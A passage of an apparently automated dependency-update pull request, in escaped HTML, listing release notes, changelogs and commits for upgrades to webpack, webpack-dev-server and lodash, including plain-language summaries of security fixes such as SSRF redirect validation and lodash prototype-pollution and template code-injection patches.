mode.\u003c/li\u003e\n\u003cli\u003e50689e1: Use the fully qualified class name (or export name) for \u003ccode\u003e[fullhash]\u003c/code\u003e placeholder in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Support universal lazy compilation.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed module library export definitions when multiple runtimes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed CSS nesting and CSS custom properties parsing.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't write fragment from URL to filename and apply fragment to module URL.\u003c/li\u003e\n\u003cli\u003eaab1da9: Fixed bugs for \u003ccode\u003ecss/global\u003c/code\u003e type.\u003c/li\u003e\n\u003cli\u003ed3dd841: Compatibility \u003ccode\u003eimport.meta.filename\u003c/code\u003e and \u003ccode\u003eimport.meta.dirname\u003c/code\u003e with \u003ccode\u003eeval\u003c/code\u003e devtools.\u003c/li\u003e\n\u003cli\u003ed3dd841: Handle nested \u003ccode\u003e__webpack_require__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e728ddb7: The speed of identifier parsing has been improved.\u003c/li\u003e\n\u003cli\u003e0f8b31b: Improve types.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't corrupt \u003ccode\u003edebugId\u003c/code\u003e injection when \u003ccode\u003ehidden-source-map\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003e2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Serialize \u003ccode\u003eHookWebpackError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added ability to use built-in properties in dotenv and define plugin.\u003c/li\u003e\n\u003cli\u003e3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.\u003c/li\u003e\n\u003cli\u003ed3dd841: Reduce collision for local indent name in CSS.\u003c/li\u003e\n\u003cli\u003ed3dd841: Remove CSS link tags when CSS imports are removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc\"\u003e\u003ccode\u003e24e3c2d\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20253\"\u003e#20253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/2efd21b0b06baa9b1a7f009b336379dcef24c1a5\"\u003e\u003ccode\u003e2efd21b\u003c/code\u003e\u003c/a\u003e fix(re-exports): reexports runtime calculation should not accessing `__WEBPAC...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/c5100702335a9cdcb75558ccd80def2329bd4abf\"\u003e\u003ccode\u003ec510070\u003c/code\u003e\u003c/a\u003e fix(security): userinfo bypass vulnerability in HttpUriPlugin allowedUris\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/4b0501c69700963bad1285b56f9cfa74704cb963\"\u003e\u003ccode\u003e4b0501c\u003c/code\u003e\u003c/a\u003e ci: fix release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20252\"\u003e#20252\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/0c213cecf2906bc41102c3a4cfdd1ad3522d0171\"\u003e\u003ccode\u003e0c213ce\u003c/code\u003e\u003c/a\u003e ci: use \u003ccode\u003e\\\u0026lt;@\u0026amp;1450591255485743204\u0026gt;\u003c/code\u003e over \u003ccode\u003e@here\u003c/code\u003e for discord notificationw\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/5bf8bc51bcfb49d25b73aae450b246cd8b8b423a\"\u003e\u003ccode\u003e5bf8bc5\u003c/code\u003e\u003c/a\u003e refactor: types for benchmarks and tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/505a5e744fbcf4471ddb534bf1d4aebea9643c1b\"\u003e\u003ccode\u003e505a5e7\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20188\"\u003e#20188\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/0c066808d59e4f9406e11bab4ffa2e0feacbd0e2\"\u003e\u003ccode\u003e0c06680\u003c/code\u003e\u003c/a\u003e refactor: update eslint configuration\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/2eb0d6a410513960bd7d65bf15baf15704a612eb\"\u003e\u003ccode\u003e2eb0d6a\u003c/code\u003e\u003c/a\u003e ci: release announcement (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20238\"\u003e#20238\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/b2b24590a08755b706d2009ca97a226addf9e83b\"\u003e\u003ccode\u003eb2b2459\u003c/code\u003e\u003c/a\u003e ci: cancel in progress (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20239\"\u003e#20239\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack/compare/v5.90.0...v5.104.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 4.15.1 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.1...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lodash` from 4.17.23 to 4.18.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lodash/lodash/releases\"\u003elodash's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.18.1\u003c/h2\u003e\n\u003ch2\u003eBugs\u003c/h2\u003e\n\u003cp\u003eFixes a \u003ccode\u003eReferenceError\u003c/code\u003e issue in \u003ccode\u003elodash\u003c/code\u003e \u003ccode\u003elodash-es\u003c/code\u003e \u003ccode\u003elodash-amd\u003c/code\u003e and \u003ccode\u003elodash.template\u003c/code\u003e when using the \u003ccode\u003etemplate\u003c/code\u003e and \u003ccode\u003efromPairs\u003c/code\u003e functions from the modular builds. See \u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6167#issuecomment-4165269769\"\u003elodash/lodash#6167\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThese defects were related to how lodash distributions are built from the main branch using \u003ca href=\"https://github.com/lodash-archive/lodash-cli\"\u003ehttps://github.com/lodash-archive/lodash-cli\u003c/a\u003e. When internal dependencies change inside lodash functions, equivalent updates need to be made to a mapping in the lodash-cli. (hey, it was ahead of its time once upon a time!). We know this, but we missed it in the last release. It's the kind of thing that passes in CI, but fails bc the build is not the same thing you tested.\u003c/p\u003e\n\u003cp\u003eThere is no diff on main for this, but you can see the diffs for each of the npm packages on their respective branches:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elodash\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-es\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-amd\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash.template\u003c/code\u003e\u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.18.0\u003c/h2\u003e\n\u003ch2\u003ev4.18.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.0\"\u003ehttps://github.com/lodash/lodash/compare/4.17.23...4.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.unset\u003c/code\u003e / \u003ccode\u003e_.omit\u003c/code\u003e\u003c/strong\u003e: Fixed prototype pollution via \u003ccode\u003econstructor\u003c/code\u003e/\u003ccode\u003eprototype\u003c/code\u003e path traversal (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh\"\u003eGHSA-f23m-r3pf-42rh\u003c/a\u003e, \u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003efe8d32e\u003c/a\u003e). Previously, array-wrapped path segments and primitive roots could bypass the existing guards, allowing deletion of properties from built-in prototypes. Now \u003ccode\u003econstructor\u003c/code\u003e and \u003ccode\u003eprototype\u003c/code\u003e are blocked unconditionally as non-terminal path keys, matching \u003ccode\u003ebaseSet\u003c/code\u003e. Calls that previously returned \u003ccode\u003etrue\u003c/code\u003e and deleted the property now return \u003ccode\u003efalse\u003c/code\u003e and leave the target untouched.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.template\u003c/code\u003e\u003c/strong\u003e: Fixed code injection via \u003ccode\u003eimports\u003c/code\u003e keys (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc\"\u003eGHSA-r5fr-rjxr-66jc\u003c/a\u003e, CVE-2026-4800, \u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e879aaa9\u003c/a\u003e). Fixes an incomplete patch for CVE-2021-23337. The \u003ccode\u003evariable\u003c/code\u003e option was validated against \u003ccode\u003ereForbiddenIdentifierChars\u003c/code\u003e but \u003ccode\u003eimportsKeys\u003c/code\u003e was left unguarded, allowing code injection via the same \u003ccode\u003eFunction()\u003c/code\u003e constructor sink. \u003ccode\u003eimports\u003c/code\u003e keys containing forbidden identifier characters now throw \u003ccode\u003e\u0026quot;Invalid imports option passed into _.template\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security notice for \u003ccode\u003e_.template\u003c/code\u003e in threat model and API docs (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6099\"\u003e#6099\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDocument \u003ccode\u003elower \u0026gt; upper\u003c/code\u003e behavior in \u003ccode\u003e_.random\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6115\"\u003e#6115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix quotes in \u003ccode\u003e_.compact\u003c/code\u003e jsdoc (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6090\"\u003e#6090\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003elodash.*\u003c/code\u003e modular packages\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6157\"\u003eDiff\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe have also regenerated and published a select number of the \u003ccode\u003elodash.*\u003c/code\u003e modular packages.\u003c/p\u003e\n\u003cp\u003eThese modular packages had fallen out of sync significantly from the minor/patch updates to lodash. Specifically, we have brought the following packages up to parity w/ the latest lodash release because they have had CVEs on them in the past:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.orderby\"\u003elodash.orderby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca 